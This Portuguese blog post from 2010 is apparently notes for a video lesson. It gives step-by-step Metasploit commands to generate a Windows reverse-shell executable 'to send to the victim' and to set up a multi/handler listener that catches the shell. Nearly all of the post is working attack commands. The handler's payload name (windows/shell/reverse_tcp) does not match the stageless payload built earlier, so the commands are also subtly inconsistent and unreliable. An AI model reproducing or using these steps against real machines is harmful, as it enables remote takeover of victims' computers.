20/06/10

Exploit handler+reverse_tcp


Exploit handler+reverse_tcp

 

Bem Vindos, nesta vídeo aula vamos utilizar o MetaSploit FrameWork3. Vamos usar o exploit handler e a payload shell_reverse_tcp, primeiro  vamos configurar e criar o nosso executável  com a payload shell_reverse_tcp, depois vamos configurar o exploit handler com a payload shell_reverse_tcp para ficar a escuta das ligações da vitima.


PAYLOAD= windows/shell_reverse_tcp
EXPLOIT= exploit/multi/handler

localhost= 192.168.1.4
remotehost= 192.168.1.2

SO local = Backtrack4
SO remoto = Windows server 2003 SP1



//Usar a payload shell_reverse_tcp;

#./msfpayload windows/shell_reverse_tcp O



//Configurar a payload com o host local e a porta;

#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 O



//Criar arquivo executável, a enviar para a vitima;

#./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.4 LPORT=333 X > /tmp/MrTcp.exe


//Verificar o Arquivo criado;

#file /tmp/MrTcp.exe


//Abrir o framework;

#./msfconsole

//Usar o exploit hander;

#use exploit/multi/handler

//Mostrar as opções do handler;

#show options

//Adicionar payload reverse_tcp ao exploit;

#set payload windows/shell/reverse_tcp

//Mostrar opções da payload;

#show options

//Definir o host local para ficar a espera de ligaçoes;

#set LHOST 192.168.1.4

//Definir a porta local para ficar a espera de ligações;

#set LPORT 333

//Executar exploit

#exploit

 

 

0 comentários: